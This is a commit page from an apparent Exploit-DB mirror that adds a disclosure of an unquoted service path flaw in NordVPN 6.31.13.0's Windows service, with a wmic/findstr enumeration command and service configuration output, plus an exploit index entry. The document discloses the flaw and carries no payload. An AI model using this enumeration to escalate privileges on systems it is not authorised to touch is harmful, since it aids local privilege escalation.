bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2020-09-05

Browse source 
1 changes to exploits/shellcodes

Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path
This commit is contained in:
Offensive Security 2020-09-05 05:02:01 +00:00
parent 0d540768a4
commit e286aad002
2 changed files with 35 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

34
exploits/windows/local/48790.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path
# Discovery Date: 2020-09-03
# Discovery by: chipo
# Vendor Homepage: https://nordvpn.com
# Software Link : https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
# Tested Version: 6.31.13.0
# Tested on OS: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# Find the discover Unquoted Service Path Vulnerability:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
nordvpn-service nordvpn-service C:\Program Files\NordVPN\nordvpn-service.exe
# Service info:
C:\>sc qc servicio
[SC] QueryServiceConfig SUCCESS
NOMBRE_SERVICIO: nordvpn-service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\NordVPN\nordvpn-service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : nordvpn-service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.

1
files_exploits.csv
View file

@ -10373,6 +10373,7 @@ id,file,description,date,author,type,platform,port
42718,exploits/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",local,windows,
42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows,
42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows,
48790,exploits/windows/local/48790.txt,"Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path",2020-09-04,chipo,local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,

Can't render this file because it is too large.